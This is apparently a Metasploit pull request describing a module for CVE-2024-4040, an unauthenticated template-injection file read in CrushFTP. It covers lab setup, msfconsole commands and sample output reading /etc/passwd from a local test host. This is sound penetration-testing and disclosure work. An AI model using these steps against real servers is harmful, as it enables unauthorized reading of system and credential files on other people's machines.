Auxiliary module for CVE-2024-4040 - CrushFTP arbitrary file read

[remmons-r7]

This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).

Testing

To set up a test environment:

1. Download an affected version of CrushFTP here.
2. Configure CRUSH_DIR in crushftp_init.sh to point to the correct install directory.
3. Execute java -jar CrushFTP.jar to show a local client GUI interface that can be used to set up an admin account.
4. Execute sudo crushftp_init.sh start to launch the software on Linux or Mac. If on Windows, run CrushFTP.exe as an administrator.
5. Follow the verification steps below.

Verification

1. Start msfconsole
2. use auxiliary/gather/crushftp_fileread_cve_2024_4040
3. set RHOSTS <TARGET_IP_ADDRESS>
4. set RPORT <TARGET_PORT>
5. set TARGETFILE <TARGET_FILE_TO_READ>
6. set STORE_LOOT false if you want to display file on the console instead of storing it as loot.
7. run

Example usage

msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 

Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):

   Name        Current Setting             Required  Description
   ----        ---------------             --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      0.0.0.0                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       443                         yes       The target port (TCP)
   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
   STORE_LOOT  true                        no        Store the target file as loot
   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (if firewalls permit)
   VHOST                                   no        HTTP server virtual host

View the full module info with the info, or info -d command.

msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set STORE_LOOT false
STORE_LOOT => false
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Server-side template injection successful!
[*] Fetching anonymous session cookie...
[*] Using template injection to read file: users/MainUsers/groups.XML
[+] File read succeeded! 
<?xml version="1.0" encoding="UTF-8"?>
<groups type="properties"></groups>

[*] Auxiliary module execution completed

Thank you!

[cdelafuente-r7]

Thanks for updating this @remmons-r7! Everything looks good to me now. I tested against version 10.5.0 and verified The requested file was correctly retrieved. I'll go ahead and land it.

• Example output:

  
  msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run verbose=true rhosts=127.0.0.1 targetfile=/etc/passwd
  [*] Running module against 127.0.0.1

[] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. Server-side template injection successful! [] Fetching anonymous session cookie... [*] Using template injection to read file: /etc/passwd [+] File read succeeded! root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[*] Auxiliary module execution completed

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions prior to 10.7.1 and prior to 11.1.0 (as well as legacy 9.x versions) to read any files on the server file system as root.